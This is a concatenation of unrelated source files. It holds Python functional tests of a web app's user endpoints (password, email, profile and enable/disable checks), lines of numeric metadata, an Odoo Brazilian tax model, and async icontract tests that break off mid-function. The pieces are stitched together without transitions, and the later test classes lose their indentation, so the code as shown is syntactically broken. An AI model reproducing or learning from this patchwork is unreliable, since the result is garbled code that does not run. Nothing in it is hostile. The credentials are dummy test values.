        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        user = uapi.get_one(user_id)
        assert user.validate_password("password")
        assert not user.validate_password("mynewpassword")
        # Set password
        params = {
            "new_password": "mynewpassword",
            "new_password2": "mynewpassword",
            "loggedin_user_password": "admin@admin.admin",
        }
        self.testapp.put_json(
            "/api/v2/users/{}/password".format(user_id), params=params, status=204
        )
        # Check After: re-fetch through a fresh session to see the new hash.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert not user.validate_password("password")
        assert user.validate_password("mynewpassword")

    def test_api__set_user_password__err_403__admin_wrong_password(self):
        """A wrong loggedin_user_password yields 403; the password is unchanged."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        user = uapi.get_one(user_id)
        assert user.validate_password("password")
        assert not user.validate_password("mynewpassword")
        # Set password with a wrong confirmation password for the logged-in user.
        params = {
            "new_password": "mynewpassword",
            "new_password2": "mynewpassword",
            "loggedin_user_password": "wrongpassword",
        }
        res = self.testapp.put_json(
            "/api/v2/users/{}/password".format(user_id), params=params, status=403
        )
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.WRONG_USER_PASSWORD
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        # Check After
        user = uapi.get_one(user_id)
        assert user.validate_password("password")
        assert not user.validate_password("mynewpassword")

    def test_api__set_user_password__err_400__admin_passwords_do_not_match(self):
        """Mismatched new_password/new_password2 yield 400 PASSWORD_DO_NOT_MATCH."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        user = uapi.get_one(user_id)
        assert user.validate_password("password")
        assert not user.validate_password("mynewpassword")
        assert not user.validate_password("mynewpassword2")
        # Set password with two different values: must be rejected.
        params = {
            "new_password": "mynewpassword",
            "new_password2": "mynewpassword2",
            "loggedin_user_password": "admin@admin.admin",
        }
        res = self.testapp.put_json(
            "/api/v2/users/{}/password".format(user_id), params=params, status=400
        )
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.PASSWORD_DO_NOT_MATCH
        # Check After
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert user.validate_password("password")
        assert not user.validate_password("mynewpassword")
        assert not user.validate_password("mynewpassword2")

    def test_api__set_user_password__ok_200__user_itself(self):
        """A user can change his own password (204, no body)."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # check before
        user = uapi.get_one(user_id)
        assert user.validate_password("password")
        assert not user.validate_password("mynewpassword")
        # Set password
        params = {
            "new_password": "mynewpassword",
            "new_password2": "mynewpassword",
            "loggedin_user_password": "password",
        }
        self.testapp.put_json(
            "/api/v2/users/{}/password".format(user_id), params=params, status=204
        )
        # Check After
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert not user.validate_password("password")
        assert user.validate_password("mynewpassword")

    def test_api__set_user_email__err_403__other_normal_user(self):
        """
        A normal user cannot change another user's email (403).
        NOTE(review): this method targets the /email endpoint and duplicates
        the test of the same name in TestSetEmailEndpoint — it looks misplaced
        in the password test class; confirm before removing or renaming.
        """
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            lang="fr",
            timezone="Europe/Paris",
            do_save=True,
            do_notify=False,
        )
        test_user2 = uapi.create_user(
            email="test2@test2.test2",
            password="password",
            name="bob2",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user2)
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        # Authenticate as test_user2 and target test_user.
        self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
        # Set email
        params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "password"}
        res = self.testapp.put_json(
            "/api/v2/users/{}/email".format(user_id), params=params, status=403
        )
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetUserInfoEndpoint(FunctionalTest):
    # -*- coding: utf-8 -*-
    """
    Tests for PUT /api/v2/users/{user_id}

    Covers updating public_name, timezone and lang, for admin, for the user
    himself, and the 403 case for an unrelated normal user.
    """

    fixtures = [BaseFixture]

    def test_api__set_user_info__ok_200__admin(self):
        """An admin can update another user's public_name, timezone and lang."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["user_id"] == user_id
        assert res["public_name"] == "bob"
        assert res["timezone"] == "Europe/Paris"
        assert res["lang"] == "fr"
        # Set params
        params = {"public_name": "updated", "timezone": "Europe/London", "lang": "en"}
        self.testapp.put_json("/api/v2/users/{}".format(user_id), params=params, status=200)
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["user_id"] == user_id
        assert res["public_name"] == "updated"
        assert res["timezone"] == "Europe/London"
        assert res["lang"] == "en"

    def test_api__set_user_info__ok_200__user_itself(self):
        """A user can update his own public_name, timezone and lang."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # check before
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["user_id"] == user_id
        assert res["public_name"] == "bob"
        assert res["timezone"] == "Europe/Paris"
        assert res["lang"] == "fr"
        # Set params
        params = {"public_name": "updated", "timezone": "Europe/London", "lang": "en"}
        self.testapp.put_json("/api/v2/users/{}".format(user_id), params=params, status=200)
        # Check After
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["user_id"] == user_id
        assert res["public_name"] == "updated"
        assert res["timezone"] == "Europe/London"
        assert res["lang"] == "en"

    def test_api__set_user_info__err_403__other_normal_user(self):
        """A normal user cannot update another user's info (403)."""
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        test_user2 = uapi.create_user(
            email="test2@test2.test2",
            password="password",
            name="test",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user2)
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        # Authenticate as test_user2 and target test_user.
        self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
        # Set params
        params = {"public_name": "updated", "timezone": "Europe/London", "lang": "en"}
        res = self.testapp.put_json("/api/v2/users/{}".format(user_id), params=params, status=403)
        assert res.json_body
        assert "code" in res.json_body
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetUserProfileEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}/profile
"""
fixtures = [BaseFixture]
def test_api__set_user_profile__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["profile"] == "users"
# Set params
params = {"profile": "administrators"}
self.testapp.put_json("/api/v2/users/{}/profile".format(user_id), params=params, status=204)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["profile"] == "administrators"
def test_api__set_user_profile__err_400__admin_itself(self):
"""
Trying to set is own profile as user with admin right.
Return 400 because of "not allow to set own profile check"
"""
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(admin.user_id), status=200)
res = res.json_body
assert res["user_id"] == admin.user_id
assert res["profile"] == "administrators"
# Set params
params = {"profile": "users"}
res = self.testapp.put_json(
"/api/v2/users/{}/profile".format(admin.user_id), params=params, status=400
)
assert res.json_body["code"] == ErrorCode.USER_CANT_CHANGE_IS_OWN_PROFILE
# Check After
res = self.testapp.get("/api/v2/users/{}".format(admin.user_id), status=200)
res = res.json_body
assert res["user_id"] == admin.user_id
assert res["profile"] == "administrators"
def test_api__set_user_profile__err_403__other_normal_user(self):
"""
Set user profile of user normal user as normal user
Return 403 error because of no right to do this as simple user
"""
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="test",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
# Set params
params = {"profile": "administrators"}
res = self.testapp.put_json(
"/api/v2/users/{}/profile".format(user_id), params=params, status=403
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetUserEnableDisableEndpoints(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}/enabled
and PUT /api/v2/users/{user_id}/disabled
"""
fixtures = [BaseFixture]
def test_api_enable_user__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.disable(test_user, do_save=True)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is False
self.testapp.put_json("/api/v2/users/{}/enabled".format(user_id), status=204)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
def test_api_disable_user__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.enable(test_user, do_save=True)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=204)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is False
def test_api_disable_user__err_400__cant_disable_myself_admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
res = self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=400)
assert res.json_body["code"] == ErrorCode.USER_CANT_DISABLE_HIMSELF
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
def test_api_enable_user__err_403__other_account(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="test2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.disable(test_user, do_save=True)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
res = self.testapp.put_json("/api/v2/users/{}/enabled".format(user_id), status=403)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api_disable_user__err_403__other_account(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="test2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.enable(test_user, do_save=True)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
res = self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=403)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api_disable_user__err_403__cant_disable_myself_user(self):
"""
Trying to disable himself as simple user, raise 403 because no
right to disable anyone as simple user. (check of right is before
self-disable not allowed_check).
"""
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.enable(test_user, do_save=True)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
res = self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=403)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
class TestUserEnpointsLDAPAuth(FunctionalTest):
config_section = "functional_ldap_test"
@pytest.mark.ldap
def test_api_set_user_password__err__400__setting_password_unallowed_for_ldap_user(self):
self.testapp.authorization = ("Basic", ("hubert@planetexpress.com", "professor"))
res = self.testapp.get("/api/v2/auth/whoami", status=200)
user_id = res.json_body["user_id"]
# Set password
params = {
"new_password": "mynewpassword",
"new_password2": "mynewpassword",
"loggedin_user_password": "professor",
}
res = self.testapp.put_json(
"/api/v2/users/{}/password".format(user_id), params=params, status=400
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_PASSWORD_MODIFICATION_UNALLOWED
@pytest.mark.ldap
def test_api_set_user_email__err__400__setting_email_unallowed_for_ldap_user(self):
self.testapp.authorization = ("Basic", ("hubert@planetexpress.com", "professor"))
res = self.testapp.get("/api/v2/auth/whoami", status=200)
user_id = res.json_body["user_id"]
# Set password
params = {
"email": "hubertnewemail@planetexpress.com",
"loggedin_user_password": "professor",
}
res = self.testapp.put_json(
"/api/v2/users/{}/email".format(user_id), params=params, status=400
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_EMAIL_MODIFICATION_UNALLOWED
@pytest.mark.ldap
def test_api__create_user__ok_200__full_admin(self):
self.testapp.authorization = ("Basic", ("hubert@planetexpress.com", "professor"))
self.testapp.get("/api/v2/auth/whoami", status=200)
api = UserApi(current_user=None, session=self.session, config=self.app_config)
user = api.get_one_by_email("hubert@planetexpress.com")
gapi = GroupApi(session=self.session, config=self.app_config, current_user=user)
api.update(
user, auth_type=user.auth_type, groups=[gapi.get_one_with_name("administrators")]
)
api.save(user)
transaction.commit()
params = {
"email": "test@test.test",
"password": "mysuperpassword",
"profile": "users",
"timezone": "Europe/Paris",
"lang": "fr",
"public_name": "test user",
"email_notification": False,
}
res = self.testapp.post_json("/api/v2/users", status=200, params=params)
res = res.json_body
assert res["auth_type"] == "unknown"
assert res["email"] == "test@test.test"
assert res["public_name"] == "test user"
assert res["profile"] == "users"
| 42.600229
| 100
| 0.620323
| 21,524
| 185,737
| 5.105138
| 0.017841
| 0.024135
| 0.039724
| 0.045821
| 0.966574
| 0.961441
| 0.959257
| 0.955507
| 0.952604
| 0.946834
| 0
| 0.00994
| 0.264465
| 185,737
| 4,359
| 101
| 42.610002
| 0.79438
| 0.029929
| 0
| 0.858901
| 0
| 0
| 0.135769
| 0.034224
| 0
| 0
| 0
| 0.000459
| 0.121204
| 1
| 0.022251
| false
| 0.050524
| 0.005236
| 0
| 0.036126
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b88cd4465e0998bfde8cf5d3b06ed7ccc113054a
| 2,126
|
py
|
Python
|
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/l10n_br/models/account.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | 1
|
2019-12-19T01:53:13.000Z
|
2019-12-19T01:53:13.000Z
|
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/l10n_br/models/account.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | null | null | null |
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/l10n_br/models/account.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
class AccountTaxTemplate(models.Model):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.template'
tax_discount = fields.Boolean(string='Discount this Tax in Prince',
help="Mark it for (ICMS, PIS e etc.).")
base_reduction = fields.Float(string='Redution', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_mva = fields.Float(string='MVA Percent', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_type = fields.Selection([('group', 'Group of Taxes'),
('fixed', 'Fixed'),
('percent', 'Percentage of Price'),
('division', 'Percentage of Price Tax Included')],
string='Tax Computation', required=True, default='percent')
class AccountTax(models.Model):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax'
tax_discount = fields.Boolean(string='Discount this Tax in Prince',
help="Mark it for (ICMS, PIS e etc.).")
base_reduction = fields.Float(string='Redution', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_mva = fields.Float(string='MVA Percent', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_type = fields.Selection([('group', 'Group of Taxes'),
('fixed', 'Fixed'),
('percent', 'Percentage of Price'),
('division', 'Percentage of Price Tax Included')],
string='Tax Computation', required=True, default='percent')
| 54.512821
| 97
| 0.535748
| 223
| 2,126
| 5.06278
| 0.331839
| 0.063773
| 0.06023
| 0.067316
| 0.875111
| 0.875111
| 0.875111
| 0.875111
| 0.875111
| 0.875111
| 0
| 0.012257
| 0.347601
| 2,126
| 38
| 98
| 55.947368
| 0.80173
| 0.08984
| 0
| 0.814815
| 0
| 0
| 0.295159
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.481481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b22de361f7cd05216856495a40345c7f6ccebbfa
| 9,575
|
py
|
Python
|
tests_3_8/async/test_args_and_kwargs_in_contract.py
|
kklein/icontract
|
718ef1733cc2cce6d3c8f59a5a37de96f8be6664
|
[
"MIT"
] | 244
|
2018-08-15T22:58:58.000Z
|
2022-03-12T16:10:39.000Z
|
tests_3_8/async/test_args_and_kwargs_in_contract.py
|
kklein/icontract
|
718ef1733cc2cce6d3c8f59a5a37de96f8be6664
|
[
"MIT"
] | 157
|
2018-08-29T21:36:47.000Z
|
2022-02-14T19:30:24.000Z
|
tests_3_8/async/test_args_and_kwargs_in_contract.py
|
kklein/icontract
|
718ef1733cc2cce6d3c8f59a5a37de96f8be6664
|
[
"MIT"
] | 23
|
2019-04-24T11:09:10.000Z
|
2022-02-14T15:56:26.000Z
|
# pylint: disable=missing-docstring
# pylint: disable=no-self-use
# pylint: disable=invalid-name
# pylint: disable=unused-argument
# pylint: disable=unnecessary-lambda
import copy
import textwrap
import unittest
from typing import Optional, Any, Tuple, Dict
import icontract
import tests.error
class TestArgs(unittest.IsolatedAsyncioTestCase):
async def test_args_without_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(x: int) -> None:
pass
await some_func(3)
assert recorded_args is not None
self.assertTupleEqual((3, ), recorded_args)
async def test_args_with_named_and_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(x: int, *args: Any) -> None:
pass
await some_func(3, 2)
assert recorded_args is not None
self.assertTupleEqual((3, 2), recorded_args)
async def test_args_with_only_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(*args: Any) -> None:
pass
await some_func(3, 2, 1)
assert recorded_args is not None
self.assertTupleEqual((3, 2, 1), recorded_args)
async def test_args_with_uncommon_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(*arguments: Any) -> None:
pass
await some_func(3, 2, 1, 0)
assert recorded_args is not None
self.assertTupleEqual((3, 2, 1, 0), recorded_args)
async def test_fail(self) -> None:
@icontract.require(lambda _ARGS: len(_ARGS) > 2)
async def some_func(*args: Any) -> None:
pass
violation_error = None # type: Optional[icontract.ViolationError]
try:
await some_func(3)
except icontract.ViolationError as err:
violation_error = err
assert violation_error is not None
self.assertEqual(
textwrap.dedent('''\
len(_ARGS) > 2:
_ARGS was (3,)
args was 3
len(_ARGS) was 1'''), tests.error.wo_mandatory_location(str(violation_error)))
class TestKwargs(unittest.IsolatedAsyncioTestCase):
async def test_kwargs_without_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(x: int) -> None:
pass
await some_func(x=3)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3}, recorded_kwargs)
async def test_kwargs_with_named_and_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
